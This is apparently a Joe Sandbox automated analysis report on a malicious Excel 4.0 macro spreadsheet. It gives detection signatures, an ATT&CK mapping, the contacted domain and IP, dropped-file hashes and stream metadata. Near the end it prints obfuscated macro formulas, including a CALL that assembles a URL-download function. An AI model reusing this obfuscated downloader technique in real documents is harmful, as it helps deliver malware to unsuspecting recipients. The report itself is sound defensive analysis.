Analysis Report estimated (99).xls
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
|
Malware Configuration |
---|
No configs have been found |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
| |
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
- • Compliance
- • Software Vulnerabilities
- • Networking
- • System Summary
- • Hooking and other Techniques for Hiding and Protection
- • HIPS / PFW / Operating System Protection Evasion
Click to jump to signature section
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: | Jump to behavior |
Uses secure TLS version for HTTPS connections |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | JA3 fingerprint: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
darmatic.co.rs | 217.26.213.91 | true | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
217.26.213.91 | unknown | Serbia | 31042 | SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 353078 |
Start date: | 15.02.2021 |
Start time: | 15:48:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 29s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | estimated (99).xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLS@3/9@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
No simulations |
---|
No context |
---|
No context |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
No context |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.0765536003145497 |
Encrypted: | false |
SSDEEP: | 6:kKymbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:23kPlE99SNxAhUeo+aKt |
MD5: | 76BF865A1B528EFDA03260D975C0279D |
SHA1: | BB67BB40383B4B369C10022491B198C54A98863C |
SHA-256: | DF953B05638EFE7B4FBAE552A40DED1E6F15283DBB6A628E1275E3CB63C1C787 |
SHA-512: | 7750386640C6604E1A02A0C65C73717D55699EDB83BE04848AEA3D7D63C332D7DB0A00DB60EE99FA2F2996B91B9C229275BBD455AD6CB1009BD7C4BA1D0AD197 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 306614 |
Entropy (8bit): | 7.987362214455033 |
Encrypted: | false |
SSDEEP: | 6144:F+QrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Msz:wQFPM8R3AsB+bjej/9cb |
MD5: | BC6FDD14EBEBE36A15F8FFEBC44223DF |
SHA1: | 13AC3CAFC809ACF846BC888977CB088BE067623A |
SHA-256: | BEF62E812377C04103B58AE97DE93EDF795DBB5D09CEB74E8F6D88C86BC0DBF4 |
SHA-512: | 0F0075D3AAF8FD20AE823D6CF2C1D7C39536243EF0C8BA5FBE195E052F67E18437997D1809182A2EB6758E2525E5748A0A344D97DD2CFA9E4EF98D74C57DD5DD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.476678577461042 |
Encrypted: | false |
SSDEEP: | 12:85QnLgXg/XAlCPCHaXgzB8IB/IMMhX+WnicvbiubDtZ3YilMMEpxRljKZTdJP9TK:85I/XTwz6I6FYemiDv3qYrNru/ |
MD5: | FE02A62BEEAEA1F9C9D0B899CF650687 |
SHA1: | D4FEE9C272F5D8665BA46423FE33B2F83BA45584 |
SHA-256: | 9E42B5A799B57DC6B1238E891600FB87F72944643C1BC131E476B7289CE65179 |
SHA-512: | 4C2D74DF96E7747B462B101B132A24B33ECDBE7BEC0490AAC60E62BE1679822CB1FCE6907C1156241C7859C4E47E352C7ED58CB877ACB81519A23E67D9630EFE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2068 |
Entropy (8bit): | 4.551887714300889 |
Encrypted: | false |
SSDEEP: | 24:8xb/XTwz6IknkmemBzpDv3qYdM7dD2xb/XTwz6IknkmemBzpDv3qYdM7dV:8t/XT3IkZ9yYQh2t/XT3IkZ9yYQ/ |
MD5: | A96D3D1B6000AA3A714F7CA30A364420 |
SHA1: | 9ABC0A9C9886A5C22C4CED4997E19EC007E456D1 |
SHA-256: | EE7779C948E06AA47BD29350726079C45BA072324D5DC8607AB3EEB3783C5570 |
SHA-512: | 9529749DAEA9FF1843FEF18FFF0E7A76D885F7647163E4360223A10CCCEE64FFC27456713128595D020E1156F6BEC3E2B42FC9C84195931567A06E99B0E2ECEB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 95 |
Entropy (8bit): | 4.563263172107174 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMVfNtkCYWRMENtkCmMVfNtkCv:dj6Rzk0MEzkURzks |
MD5: | 5CEE92E4C0AF90E3FC4A43698C69AE1E |
SHA1: | E0E34E419508A6738C68458DBE2F29FB48556FC5 |
SHA-256: | F39016E5C1D5F8ACDCCA2EF35B4B681EC731BA560A249B390B068B68C08B509C |
SHA-512: | 22D621C072FF774ED8E7A24E60B063DC5E847579C7AD26619D907B2D605A2121709183858A58512059BBE984CE2B2E4A7CEF483BF0CC77294040EA610B58459B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 379198 |
Entropy (8bit): | 7.261926599542817 |
Encrypted: | false |
SSDEEP: | 6144:dcKoSsxzNDZLDZjlbR868O8KL5L+2e32xEtjPOtioVjDGUU1qfDlavx+W2QnAFEG:ReLUIRfUI5uXL6nDJova |
MD5: | 30CBF379E4470CA50EB294FC673002F7 |
SHA1: | 5BE04B40DDD5C05B10E3D402FB757F52D0FF05A7 |
SHA-256: | EB16EC58D9429A953E1E0BE29E58304A1B0B164DD72955145E7666C71A71B6FB |
SHA-512: | C759D01FAD86518AC000D67B8473E62F3DBE438A7FB879290E5DCA2FED4177CC69A642BE6925853AC10113BAA703EC6CE5FC9568D6C34F817067A6DA0BF83750 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.583974579639269 |
TrID: |
|
File name: | estimated (99).xls |
File size: | 326144 |
MD5: | 48e967d6fb49bad425f2a30e9397044b |
SHA1: | f173318107c6cb325fd1271644db2a394f993f69 |
SHA256: | ed67c2bce3ce33f697d5d60f73f861bdba018cd71610e5cdcc92427263fca8a1 |
SHA512: | 7f9bf241c46103f79bcb7d706295e1ac64183fd511df9570bc1f7cf399603d6875a6845ad348226c88ec4f8923d556826b56b259c73220d778eeff8de82280f1 |
SSDEEP: | 6144:EcKoSsxzNDZLDZjlbR868O8KlVH3Be3q7uDphYHceXVhca+fMHLty/xcl8uUM+lQ:GeLUIRfUI5uXL6nDJoM |
File Content Preview: | ........................>.......................{...........................v...w...x...y...z.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-15 09:57:01 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.337451371743 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . D o c 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00 |
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.250492291218 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 313908 |
Entropy: | 7.7178226629 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.ARRAY(Doc3!AF23&""2 "",before.2.0.0.sheet!AD15)","=FORMULA.ARRAY(Doc2!AF3,Doc2!AE22)","=FORMULA.ARRAY(Doc2!AE3&Doc2!AE4&Doc2!AE5&Doc2!AE6&Doc2!AE7&Doc2!AE8&Doc2!AE9&Doc2!AE10&Doc2!AE11&Doc2!AE12&Doc2!AE13&Doc2!AE14&Doc2!AE15&Doc2!AE16&Doc2!AE17&Doc2!AE18&Doc2!AE19&Doc2!AE20,before.2.0.0.sheet!AF15)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.0.0.sheet!AK22()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""U""&""R""&Doc2!AF8&""n"",Doc3!AF22&Doc3!AF21&Doc2!AD24&Doc2!AE22,""JJCCBB"",0,before.2.0.0.sheet!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AF7,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=Doc3!AI4(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,